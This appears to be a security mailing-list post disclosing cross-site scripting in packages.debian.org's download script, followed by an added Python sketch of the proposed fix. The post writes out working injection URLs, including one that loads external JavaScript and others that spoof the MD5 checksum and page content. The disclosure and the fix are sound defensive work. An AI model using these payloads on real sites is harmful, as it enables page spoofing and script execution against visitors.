Hello, [please CC me in replies, I'm not subscribed]
it's easy to do some code injection in packages.debian.org:

http://packages.debian.org/cgi-bin/download.pl?arch=i386&file=pool%2Fmain%2Fd%2Fdietlibc%2Fdietlibc_0.28-3_i386.deb&md5sum=not%20available%20because%20the%20site%20is%20hacked&arch=i386&type=main

Credits go to fefe (http://blog.fefe.de/?ts=bb838974) for finding this.

Even better:

http://packages.debian.org/cgi-bin/download.pl?arch=i386&file=pool%2Fmain%2Fd%2Fdietlibc%2Fdietlibc_0.28-3_i386.deb&md5sum=not%20available%20because%20the%20site%20is%20hacked<script%20src="http://www.cboltz.de/tmp/alert.js"></script>&arch=i386&type=main

Or my personal favorite:

http://packages.debian.org/cgi-bin/download.pl?arch=i386&file=pool%2Fmain%2Fd%2Fdietlibc%2Fdietlibc_0.28-3_i386.deb&md5sum=d41d8cd98f00b204e9800998ecf8427e<p>Powered%20by%20<img%20src="http://files.opensuse.org/opensuse/en/f/ff/Opensuse-green.png">&arch=i386&type=main

*SCNR*

One could also "just" inject wrong MD5SUMs easily...

Proposed solution: Please read the MD5SUM from a file or database instead of a URL parameter ;-)

Regards,

Christian Boltz
--
Fontlinge developer
Fontlinge - font management for Linux / Schriftenverwaltung für Linux
Info and download: http://www.gesindel.de
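
The proposed solution above, sketched as an added example; it is not part of the original message and not the code behind download.pl. Python is used for illustration, and TRUSTED_INDEX, single(), render_download_page() and the checksum value in the index are assumptions constructed for this sketch.

```python
import html
from urllib.parse import parse_qs

# Constructed stand-in for the archive's own server-side index
# ((arch, path) -> MD5). The checksum is a placeholder, not the real one.
TRUSTED_INDEX = {
    ("i386", "pool/main/d/dietlibc/dietlibc_0.28-3_i386.deb"):
        "0123456789abcdef0123456789abcdef",
}

# Constructed request modelled on the report: md5sum carries markup and
# arch is repeated.
SAMPLE_QUERY = (
    "arch=i386&file=pool%2Fmain%2Fd%2Fdietlibc%2Fdietlibc_0.28-3_i386.deb"
    "&md5sum=d41d8cd98f00b204e9800998ecf8427e%3Cp%3EPowered%20by"
    "&arch=i386&type=main"
)


def single(params, name):
    """Return a parameter's one value; reject missing or conflicting repeats."""
    values = set(params.get(name, []))
    if len(values) != 1:
        raise ValueError(f"parameter {name!r} missing or ambiguous")
    return values.pop()


def render_download_page(query_string, index=TRUSTED_INDEX):
    """Build the download page body; returns (status, html_body)."""
    params = parse_qs(query_string, keep_blank_values=True)
    try:
        arch = single(params, "arch")
        path = single(params, "file")
    except ValueError as exc:
        return 400, f"<p>Bad request: {html.escape(str(exc))}</p>"

    # The checksum comes from server-side data only. Any md5sum= in the
    # request is never read, so it cannot reach the page.
    md5 = index.get((arch, path))
    if md5 is None:
        return 404, "<p>No such package file.</p>"

    # Escape on output as well, in case the index itself is ever wrong.
    return 200, (
        f"<h1>Download {html.escape(path.rsplit('/', 1)[-1])}</h1>\n"
        f"<p>Architecture: {html.escape(arch)}</p>\n"
        f"<p>MD5 checksum: <tt>{html.escape(md5)}</tt></p>"
    )
```

Because the file path is used only as a lookup key into the index, a request for a path the archive does not carry ends in a 404 instead of a page built from attacker-chosen text.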